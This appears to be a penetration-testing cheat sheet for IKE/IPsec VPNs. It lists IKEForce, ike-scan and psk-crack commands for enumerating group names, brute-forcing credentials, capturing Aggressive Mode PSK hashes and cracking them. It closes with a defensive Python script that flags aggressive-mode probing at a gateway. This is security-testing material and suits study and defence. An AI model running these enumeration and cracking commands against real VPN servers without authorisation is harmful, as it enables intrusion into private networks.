# 500 - IKE (IPSEC)

### IKEForce

Use IKEForce to enumerate or dictionary attack VPN servers.

Install:

```
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
```

Perform IKE VPN enumeration with IKEForce:

`./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic`

Bruteforce IKE VPN using IKEForce:

`./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1`

### ike-scan

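```
# Main Mode discovery
ike-scan TARGET-IP
# Aggressive Mode handshake
ike-scan -A TARGET-IP
# Aggressive Mode with a group ID; the file name must be attached to the option
ike-scan -A TARGET-IP --id=myid --pskcrack=TARGET-IP-key
```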

### IKE Aggressive Mode PSK Cracking

1. Identify VPN Servers
2. Enumerate with IKEForce to obtain the group ID
3. Use ike-scan to capture the PSK hash from the IKE endpoint
4. Use psk-crack to crack the hash

Step 1: Identify IKE Servers (uses <https://github.com/portcullislabs/udp-proto-scanner>)

`./udp-proto-scanner.pl -p ike SUBNET/24`

Step 2: Enumerate group name with IKEForce

`./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic`

Step 3: Use ike-scan to capture the PSK hash

`ike-scan -M -A -n example_group --pskcrack=hash-file.txt TARGET-IP`

Step 4: Use psk-crack to crack the PSK hash

`psk-crack hash-file.txt`

Some more advanced psk-crack options below:

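```
# Brute force up to 5 characters with the default character set
psk-crack -b 5 TARGET-IP-key
# Brute force up to 5 characters with a custom character set
psk-crack -b 5 --charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
# Dictionary attack
psk-crack -d /path/to/dictionary-file TARGET-IP-key
```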
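
The group-name enumeration and `ike-scan -A` capture above both send IKEv1 Aggressive Mode initiations, which are visible on the wire at the VPN gateway. The following is an added example (not from the original page or from the IKEForce or ike-scan projects): it parses the ISAKMP header of UDP/500 payloads and reports sources that open many new aggressive-mode exchanges. The function names, the threshold and the sample packets are assumptions constructed for illustration.

```python
import struct
from collections import Counter

# ISAKMP header (RFC 2408, section 3.1): initiator cookie, responder cookie,
# next payload, version, exchange type, flags, message ID, total length.
ISAKMP_HDR = struct.Struct("!8s8sBBBBII")
EXCHANGE_NAMES = {2: "main", 4: "aggressive"}  # IKEv1 phase 1 exchange types


def parse_isakmp(payload):
    """Return header fields of a UDP/500 payload, or None if it is not IKEv1."""
    if len(payload) < ISAKMP_HDR.size:
        return None
    _icky, rcky, _np, version, exch, _flags, _msgid, length = ISAKMP_HDR.unpack_from(payload)
    if version >> 4 != 1 or length < ISAKMP_HDR.size:
        return None  # IKEv2 or malformed length field
    # An all-zero responder cookie marks the first packet of a new exchange.
    return {"initial": rcky == bytes(8), "mode": EXCHANGE_NAMES.get(exch, "other")}


def aggressive_initiators(packets, threshold=5):
    """packets: iterable of (src_ip, udp_payload). Return {src_ip: count} for
    sources that opened at least `threshold` new aggressive-mode exchanges."""
    counts = Counter()
    for src, payload in packets:
        hdr = parse_isakmp(payload)
        if hdr and hdr["initial"] and hdr["mode"] == "aggressive":
            counts[src] += 1
    return {src: n for src, n in counts.items() if n >= threshold}


def _sample(cookie, exch):
    """Build a constructed 28-byte IKEv1 header (not captured traffic)."""
    return ISAKMP_HDR.pack(cookie, bytes(8), 1, 0x10, exch, 0, 0, ISAKMP_HDR.size)


# Constructed sample traffic using RFC 5737 documentation addresses.
SAMPLE = [("198.51.100.7", _sample(bytes([i + 1]) * 8, 4)) for i in range(6)]
SAMPLE.append(("192.0.2.10", _sample(b"\xaa" * 8, 2)))  # one main-mode peer
SAMPLE.append(("192.0.2.10", b"\x00" * 10))             # too short, ignored

if __name__ == "__main__":
    print(aggressive_initiators(SAMPLE))
```

Feed it `(source, payload)` pairs from a packet capture on the gateway's UDP/500 listener; a gateway that only accepts Main Mode or IKEv2 should see no legitimate aggressive-mode initiations at all.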

